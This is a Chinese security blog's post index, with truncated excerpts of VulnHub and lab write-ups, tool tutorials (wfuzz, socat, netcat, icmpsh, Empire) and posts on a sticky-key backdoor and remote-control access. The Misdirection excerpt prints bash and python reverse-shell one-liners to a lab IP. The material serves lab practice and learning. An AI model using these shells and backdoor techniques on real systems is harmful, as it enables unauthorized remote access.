自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(94)
  • 收藏
  • 关注

原创 个人博客说明

更多详细,完整图片的文章还请师傅们动动小手到博客园去看吧。本人博客主要发布平台为博客园。

2024-02-07 21:46:46 393 1

原创 用于模糊测试的工具

用于模糊测试的工具WfuzzWfuzz通过将占位符 FUZZ 替换为 wordlist 值来工作。为了更清楚地理解这一点,让我们考虑一个例子:$ wfuzz -w userIDs.txt https://example.com/view_photo?userId=FUZZ在上面的命令中,userIds.txt 是一个包含数字 ID 值的 worldlist 文件。在这里,我们告诉 wfu...

2024-07-01 19:20:00 349

原创 Kali中MSF利用永恒之蓝(复现)

Kali中MSF利用永恒之蓝(复现)1、进入MSF框架:2、搜索MS17_010漏洞:这里找到了四个模块:0、1、4是漏洞利用模块;2、3是辅助模块,主要探测主机是否存在MS17_010漏洞。3、利用Auxiliary辅助探测模块对漏洞进行探测(查看下所需要的参数):4、设置要探测的远程目标(两种方式探测):(有[+]号的就是可能存在漏洞的主机,这里有1个主机存在漏洞)5、...

2024-06-16 23:03:00 167

原创 crontab设置计划任务

crontab设置计划任务# 设置定时任务crontab -e# 或vim /etc/crontab# 如每天晚上11点到早上7点之间,每小时执行一次/root/backup.sh脚本,并将输出内容导出到/var/backup_log.txt* 23-7/1 * * * root /root/backup.sh >> /var/backup_log.txt星号(*)...

2024-06-12 16:06:00 97

原创 Socat多功能网络工具

Socat多功能网络工具socat的启用:与nc相同①基本使用方法一、监听/聊天工具1、Windows做客户端,kali做服务端服务端kali开放7777号端口让客户端Windows7连接(谁做服务端,谁就要加stdout)Windows7连接Kali的7777端口2、Windows做服务端,kali做客户端②基本使用方法二、正/反向弹shellkali上使用soc...

2024-06-11 15:21:00 345

原创 Python_编程基础

Python_编程基础Python编程基础0、简单介绍解释型语言:一边编译一边运行,不需要进行编译,运行效率比较低 解释器 JavaScript-浏览器 python.exe php.exe编译型语言:运行前需要进行编译,运行效率比较高 C .c->.exe组合:anaconda+pycharm、python+pycharm/sublime/geany/vsc...

2024-06-08 23:16:00 302

原创 内网渗透_远控

内网渗透_远控ToDeskToDesk_Lite官方最新下载地址:https://dl.todesk.com/windows/ToDesk_Lite.exe利用powershell建立http连接下载todesk_lite.exePS C:\Users\Administrator\Desktop> powershell.exe -c Invoke-WebRequest -U...

2024-06-05 16:15:00 772

原创 kali简单安装docker和docker-compose

kali简单安装docker和docker-compose更新kali安装dockersudo apt-get install docker.io安装docker-composesudo apt-get install docker-compose检查docker和docker-composesudo docker -vsudo docker-compose -vPil...

2024-06-04 13:15:00 171

原创 kali Linux 操作系统更新命令脚本

kali Linux 操作系统更新命令脚本执行方法sudo apt install dos2unixdos2unix update_script.shsudo ./update_script.shkali Linux 操作系统更新命令脚本#!/bin/bashclearRED='\033[0;31m'GREEN='\033[0;32m'YELLOW='\033[0;33m...

2024-06-02 11:35:00 378

原创 脚本文件的换行符转换

脚本文件的换行符转换dos2unix是将Windows格式文件转换为Unix、Linux格式的实用命令。Windows格式文件的换行符为\r\n,而Unix&Linux文件的换行符为\n。 dos2unix命令其实就是将文件中的\r\n 转换为\n。dos2unix 命令用于将 Windows 格式的文件转换为 Unix&Linux 格式,而 unix2dos 命令用于将 U...

2024-06-01 17:02:00 373

原创 13、LAMP SecurityCTF5(VulnHub)

LAMP SecurityCTF5一、nmapcat ports | grep open | awk -F '/' '{print $1}' | tr '\n' ','cat ports | grep open | awk -F '/' '{print $1}' | paste -sd ',' > nmap_open_port_total.txtPORT STATE ...

2024-05-06 10:37:00 286

原创 14、pWnOS_v2.0(VulnHub)

pWnOS_v2.0一、nmap靶机ip找不见的自行上网查找解决办法。二、web渗透目录爆破/blog/whatweb/search.php/register.phpqwe123qwe点击给定的链接兔子洞,无法登入?一直卡在这个界面wfuzz貌似没什么用nmap -> 目录Simple PHP Blog 0.4.0perl ...

2024-04-29 22:26:00 233

原创 39、BlackRose(VulnHub)

BlackRose一、nmap二、web渗透随便看看注册进去账号:xxxxxx密码:xxxxxx目录爆破有很多特殊的目录,不过访问后都重定向了burpsuite改包进admin查看xxxxxx用户数据包抓一些xxxxxx用户的一些记录包,看看有什么可用的signature=&command=id&indexcsrf=3cb58993bfd7...

2024-04-28 15:04:00 411

原创 37、Tomato(VulnHub)

Tomato一、nmap2211是ssh的端口,21的ftp也不是弱密码二、web渗透随便看看目录爆破/seclists/Discovery/Web-Content/common.txt/antibot_image/antibots/readme.txt发现该站点存在反爬机制/antibot_image/antibots/info.php提示我们该网页存在...

2024-04-17 12:53:00 545

原创 Brainpan(VulnHub)

Brainpan1、nmap2、web渗透随便看看目录爆破使用不同工具,不同字典进行爆破9999端口分析10000端口分析字符串信息中,提示这个程序不能运行在DOS模式下,然后有32个A,还有一行关于复制字节到缓冲区的信息,还有一行比较奇怪的字符shitstorm,有可能会是密码,接下来就是之前浏览器看到的ascii图案。3、常规的缓冲区溢出漏洞分析与...

2024-04-14 10:29:00 1054

原创 5、Hackademic-RTB1(VulnHub)

Hackademic-RTB1一、nmap扫全端口会爆炸,暂时使用默认先扫描出两个二、web渗透随便看看简单目录爆破/Hackademic_RTB1/根据界面提示,我们可以来到这个目录源码处发现框架再次目录爆破wscan扫描WordPress 1.5.1searchsploit/wp-content/plugins/在目录爆破中发现插件目录,这...

2024-04-10 12:24:00 325

原创 daybreak简单使用

daybreak简单使用B/S架构启动or关闭daybreak# 启动方式一:chmod + x nserver_linux_amd64nserver_linux_amd64 server - tls - p 23333 &方式二:./install.sh#关闭systemctl stop daybreak.service改完端口或者其他配置文件要记得重启dayb...

2024-04-05 09:38:00 302

原创 SSRF漏洞

Web渗透_SSRF漏洞一、介绍SSRF漏洞SSRF (Server-Side Request Forgery,服务器端请求伪造) 是一种由攻击者构造请求,由服务端发起请求的安全漏洞。一般情况下,SSRF攻击的目标是外网无法访问的内部系统(正因为请求是由服务端发起的,所以服务端能请求到与自身相连而与外网隔离的内部系统)。SSRF的形成大多是由于服务端提供了从其他服务器应用获取数据的功能且没...

2024-04-04 20:46:00 548

原创 17、Connect-the-dots(VulnHub)

Connect-the-dots一、nmapcat ports | grep open | awk -F '/' '{print$1}' | paste -sd ',' > nmap_open_port_total.txt二、ftp渗透没啥三、web渗透随便看看图片隐写目录爆破没错,web端给我们的提示就是去找备份/backupsbootst...

2024-04-02 11:57:00 257

原创 Empire使用

Empire使用①Empire简单介绍Empire是一个纯粹的PowerShell开发后代理,基于加密安全的通信和灵活的体系结构构建。Empire实现了运行PowerShell代理的功能,而无需powershell.exe,从关键记录器到Mimikatz的可快速部署的利用后模块,以及适应性强的通信以逃避网络检测,所有这些都封装在以可用性为重点的框架中。它于2015年在BSidesLV上首次...

2024-03-29 12:47:00 834

原创 7、billub0x(VulnHub)

billub0x一、nmap二、web渗透随便看看万能密码没戏bp抓包导成文件sqlmapsqlmap -r sql.txt --batch --dbs --random-agent -p "un"sqlmap -r sql.txt --batch --dbs --random-agent -p "ps"都没有什么结果目录爆破图片隐写一共有六张图...

2024-03-24 09:53:00 243

原创 Moonsec_Projet_7_Writeup

Moonsec_Projet_71、基础介绍1.1 网络拓扑图主机账号密码网卡IPWindows Server 2016administrator!@#QWE123vmnet17(web) | vmnet18192.168.0.144(www.moonlab.com) | 10.10.1.131Windows Server 2012administ...

2024-03-22 10:52:00 252

原创 Moonsec_Projet_7

这里面写入的aspx一句话木马最好是能够绕过安全狗和windows defender,我直接使用webshell生成器生成的蚁剑的aspx一句话木马,添加模板写入后,没被WAF,输入完点击确定,返回模板管理。这边也是搞了好久好久,对域控的一些操作还不是那么的明白,很多操作暂时也都学的迷迷糊糊的。问题还是有,就是还得在靶机上关闭。cs生成一个无免杀的木马,尝试蚁剑上传执行后,想着该关的都关闭了,运行木马程序后还是失败了。其实上边的目录爆破都是无用功,ip无法访问到这个环境的服务,我也是后边才发现这一点的。

2024-03-22 10:47:37 821 1

原创 IPC$管道通信

IPC$管道通信IPC$(Internet Process Connection)是共享”命名管道”的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。利用IPC$,连接者甚至可以与目标主机建立一个连接,利用这个连接,连接者可以得到目标主机上的目录结构、用户列表等信息。实现IPS$管道通信的前提:被连接方需...

2024-03-19 17:11:00 416

原创 Fowsniff

发现爆破一次之后,对方会有限制,一段时间后又可以继续爆破。直接对user_passwd.txt进行爆破。

2024-03-19 17:09:19 356 1

原创 15、Fowsniff(VulnHub)

Fowsniff1、nmap2、web渗透简单浏览目录爆破发现可以文件,下载分析隐写分析无果,重新浏览80端口官网浏览pastebin.com/378rLnGi信息泄露制作字典发现爆破均无果hash识别john暴力破解hash发现爆破一次之后,对方会有限制,一段时间后又可以继续爆破。直接对user_passwd.txt进...

2024-03-18 19:18:00 132

原创 NC(netcat)基本操作

NC(netcat)基本操作前提:凭空是无法打开端口,那么我们就可以使用nc这个工具开启我们想要开放的端口。想开什么端口就可以开什么端口让别人进入。nc的启用Windows端nc使用方法Kali端nc使用方法基本使用方法一、监听/聊天工具方法:kali上使用nc去连接Windows7上的8000端口环境:Windows7(192.168.126.129),Kali(...

2024-03-17 19:14:00 1025

原创 Windows粘滞键后门

此时假如该设备设置了这种粘滞键的话就可以通过调出cmd窗口(管理员状态)进行用户的创建,并将该用户归入到管理员组当中,就可以实现没有用户信息即可登入设备的操作——粘滞键后门。在C:/Windows/System32这个目录(系统进程的目录)下可找到粘滞键sethc这个应用程序(系统进程)。出现这种情况的原因是:由于刚刚已经将权限给到管理员,但管理员的权限始终未变化,所以还是不能修改文件名称(提高)。右键cmd属性打开发现Administrators这个组的成员根本没有对该文件的完全控制权限。

2024-03-14 14:58:18 722 1

原创 小工具icmpsh的基本操作

小工具icmpsh的基本操作基础介绍原理:通过icmp这个协议进行反弹一个shell前提条件:Kali(192.168.126.134)与Windows7(192.168.126.129)靶机需要在同一个网段(内网)当中,可以进行通信操作流程1、github上下载资源,复制进Kali,进行解压GitHub - bdamele/icmpsh: Simple reverse ICMP s...

2024-03-10 20:19:00 326

原创 10、My_file_server_1(VulnHub)

My_file_server_1(VulnHub)1、nmap2、目录爆破gobusterdirbdirsearch3、文件服务器渗透PORT STATE SERVICE VERSION21/tcp open ftp vsftpd 3.0.2| ftp-syst: | STAT: | FTP server sta...

2024-03-06 20:46:00 344

原创 RCE命令执行&代码执行漏洞

RCE命令执行&代码执行漏洞RCE命令执行漏洞RCE漏洞简介RCE(remote code/command execute) 远程代码/命令执行漏洞RCE漏洞是两个漏洞:代码执行漏洞 # 针对后端语言!命令执行漏洞 # 针对系统!如何产生在 Web应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用代码或命令执行函数去处理。比如当应用在调用一些能将字符串...

2024-02-27 17:42:00 302

原创 42种常见网站漏洞

42种常见网站漏洞,让你水得快速,水得专业转载:零漏安全 2024-01-10 12:29 发表于河南免责声明:由于传播、利用本公众号"零漏安全"所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号"零漏安全"及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉谢谢!碰瓷类型1、Nginx版本泄露风险名称Nginx版...

2024-02-09 21:54:00 1063

原创 Prime(VulnHub)

刚刚发现有两个用户,saket加上获得的密码没法登入,使用victor用户加密码成功登入后台。当一个东西执行完成后,发现没什么效果,那么这里就要有一个思路。文件为什么执行,执行之后有什么效果,会实现什么东西。注意这里-n参数表示的换行符一定要注意,有换行和没有换行的md5值是不同的,如果不是很清楚可以两种都去尝试。这里告诉我们找到了正确的参数,又没说要继续做什么,那么这里就要有一个思路,看看有没有本地文件包含。enc目录有可写权限,又可执行无密码执行enc,可尝试提权。发现一个结果也没有,尝试把-n去掉。

2024-02-07 21:48:54 1958 1

原创 反序列化漏洞

反序列化漏洞什么是序列化、反序列化例子引入序列化是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象状态,重新创建该对象。简单的来讲:(含例子easy.php)序列化:把对象转换为字节序列的过程称为对象的序列化。( serialize )【类-->字符串,方便传输】O:1:"S"...

2024-02-06 09:28:00 386

原创 DC1(VulnHub)

DC1(VulnHub)1234、flag1提示flag1提示:Every good CMS needs a config file - and so do you.5、flag2提示flag2提示:Brute force and dictionary attacks aren't the only ways to gain access (and you WILL ne...

2024-02-05 00:16:00 386

原创 hackable II(VulnHub)

hackable II(VulnHub)1234567891011121314

2024-02-04 00:06:00 345

原创 Misdirection(VulnHub)

Misdirectionnmap扫描目录爆破80小探索searchsploit无果8080端口渗透反弹shellbash -i >& /dev/tcp/192.168.2.228/11111 0>&1python -c 'import socket,subprocess,os;s=socket.socket(socket.AF...

2024-02-03 23:51:00 347

原创 Upload-labs

Upload-labsUpload-labs_Pass-01-->绕过前端校验法一:关闭浏览器js的功能法二:通过先上传合法的文件后缀,在通过抓包进行文件后缀修改function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (file == null ...

2024-01-30 00:41:00 842

原创 pikachu通关教程(暴力破解)

pikachu通关教程(暴力破解)①基于表单的暴力破解不用多说,直接常见用户、弱口令爆破即可。账号:admin 密码:123456账号:test 密码:test②验证码绕过(on client)提交请求,没有抓到包,说明验证码是前端校验,只要保证能过前端,后面的验证码将不进行校验(把验证码删掉都可)。前端校验绕过前端,当我们输入一次正常的验证码即可绕过设置爆破参数成...

2024-01-28 09:21:00 355

原创 文件包含漏洞

文件包含漏洞文件包含漏洞简介文件包含漏洞基础介绍文件包含函数的参数没有经过过滤或者严格的定义,并且参数可以被用户控制,这样就可能包含非预期的文件。如果文件中存在恶意代码,无论文件是什么类型,文件内的恶意代码都会被解析并执行。文件包含漏洞可能会造成服务器的网页被篡改、网站被挂马、服务器被远程控制、被安装后门等危害。文件包含漏洞常见函数PHP当中有:include()、include_o...

2024-01-27 12:33:00 1003

2022.8.26-王鼎杯-青龙组

2022.8.26-王鼎杯-青龙组

2022-08-29

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除